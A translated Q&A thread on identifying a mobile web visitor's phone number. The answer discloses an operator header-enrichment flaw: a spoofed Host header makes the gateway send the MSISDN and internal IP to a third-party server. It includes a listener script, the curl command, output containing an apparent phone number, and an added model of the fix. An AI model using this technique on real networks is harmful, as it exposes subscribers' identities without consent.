What are the options for determining the user's mobile number? Is it possible to determine the number when the user visits special web pages? In this case, identification of the number is needed on the server side.
- JavaScript cannot read / write arbitrary files on the hard disk, copy them, or call programs. It does not have direct access to the operating system. - learn.javascript.ru/intro - entithat
- This is not a technical, but a marketing question: how to make a person leave his phone number. When a visitor comes to your site, you can determine only his IP address, even if he came from the phone - stckvrw
- There is one great option: put a form on the site asking visitors to leave a number, that's all. Those who wish to will share it; those who don't, won't. - Klimenkomud
- What for? In general, there is no purely technical way to determine it, at least for now. Social engineering is needed here. -
1 answer
The deep traffic analysis system is configured so that it adds service HTTP headers when an HTTP request is made to sites (hosts) from a list defined by the operator. The headers can contain the subscriber's internal IP address, phone number (MSISDN), IMEI and IMSI identifiers, and the identifier of the base station (tower) to which the subscriber is connected (ECI / TAC).

We will need to install a simple HTTP server on an Internet-facing server, which will receive the request, display it on the screen, and send an HTTP response. Something like this:
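
```python
#!/usr/bin/env python3
import socketserver


class MyTCPHandler(socketserver.BaseRequestHandler):
    def handle(self):
        # Accumulate data until the end of the HTTP headers is seen;
        # the headers may arrive split across several recv() calls.
        data = b""
        while b"\r\n\r\n" not in data and b"\n\n" not in data:
            chunk = self.request.recv(8192)
            if not chunk:
                return  # client closed the connection before sending full headers
            data += chunk
        # Print the raw request, including any headers added in transit.
        print("-----\r\n" + data.decode(errors="replace") + "-----")
        self.request.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 2\r\n\r\n")
        self.request.sendall(b"OK")


if __name__ == "__main__":
    HOST, PORT = "0.0.0.0", 80
    # Must be set on the class before the server binds its socket.
    socketserver.ForkingTCPServer.allow_reuse_address = True
    server = socketserver.ForkingTCPServer((HOST, PORT), MyTCPHandler)
    server.serve_forever()
```

Send an HTTP request using a MegaFon SIM card: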

```
$ curl myserver.com
OK
```

The server received:

```
GET / HTTP/1.1
Host: myserver.com
User-Agent: curl/7.51.0
Accept: */*
```

Nothing unusual. Let's change the Host header to some internal domain of the operator, for example, to the main site megafon.ru:

```
$ curl myserver.com -H "Host: megafon.ru"
```

On the server:

```
GET / HTTP/1.1
Host: megafon.ru
User-Agent: curl/7.51.0
Accept: */*
X-Real-IP: 100.114.20.123
X-NOKIA-MSISDN: 79319350195
```

Not only the HTTP headers sent by curl came to the server, but also the additional X-Real-IP and X-NOKIA-MSISDN headers containing the internal IP address (for Carrier-grade NAT) and the phone number!
Why did this happen? Apparently, when creating the list, they forgot to link specific domains to specific IP addresses or ranges, and the check that a site is on the list is performed only by comparing the HTTP Host header.

Source (there are many more subtleties, for example, the list of internal domains): https://habrahabr.ru/post/345852/

PS: do not forget that this is precisely a vulnerability, that is, a mistake in the systems of mobile operators; it is quite possible that this hole will soon be closed.

PPS: MTS has fixed this vulnerability.
- Please post links as a supplement to your answer, not instead of it. If the linked material is changed or deleted, your answer in its current wording will not make sense - tutankhamun
- @tutankhamun Thank you for the remark; I have corrected it and will take it into account in the future. - PavelNewSky
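
Added example, not part of the original answer or of any operator's system: a minimal model of the root cause the answer describes, with the Host-only list check beside a check that also binds each listed host to its IP range. The host name, networks, subscriber values and function names are constructed assumptions; only the two header names come from the page.

```python
import ipaddress

# Constructed operator list: trusted host name -> networks where it is really hosted.
TRUSTED_HOSTS = {"portal.operator.example": [ipaddress.ip_network("192.0.2.0/24")]}
# Constructed subscriber record; the header names are the ones seen in the answer.
SUBSCRIBER = {"X-Real-IP": "100.64.0.7", "X-NOKIA-MSISDN": "70000000000"}

def parse_headers(raw: bytes):
    """Return (request_line, [(name, value), ...]) from a raw HTTP/1.1 request head."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *lines = head.split("\r\n")
    headers = [tuple(part.strip() for part in line.split(":", 1))
               for line in lines if ":" in line]
    return request_line, headers

def requested_host(headers):
    """Host header value, lower-cased and without port; None if absent."""
    for name, value in headers:
        if name.lower() == "host":
            return value.split(":")[0].lower()
    return None

def host_only_policy(headers, dst_ip):
    """Flawed check from the answer: trusts whatever the client put in Host."""
    return requested_host(headers) in TRUSTED_HOSTS

def host_and_ip_policy(headers, dst_ip):
    """Hardened check: Host must be listed AND the packet must go to its network."""
    networks = TRUSTED_HOSTS.get(requested_host(headers), [])
    return any(ipaddress.ip_address(dst_ip) in net for net in networks)

def gateway_forward(raw, dst_ip, policy):
    """Return the header list the destination server would receive."""
    _, headers = parse_headers(raw)
    if policy(headers, dst_ip):
        headers += list(SUBSCRIBER.items())
    return headers

def disclosed(headers):
    """Names of subscriber-identifying headers present in a forwarded request."""
    return sorted(name for name, _ in headers if name in SUBSCRIBER)

# Constructed request: a listed Host value, sent to a server outside the listed network.
SPOOFED = b"GET / HTTP/1.1\r\nHost: portal.operator.example\r\nAccept: */*\r\n\r\n"

if __name__ == "__main__":
    print(disclosed(gateway_forward(SPOOFED, "203.0.113.10", host_only_policy)))
    print(disclosed(gateway_forward(SPOOFED, "203.0.113.10", host_and_ip_policy)))
```

With the Host-only policy the third-party server receives both identifying headers; with the host-and-IP policy it receives none, while requests that really go to the listed network are still enriched.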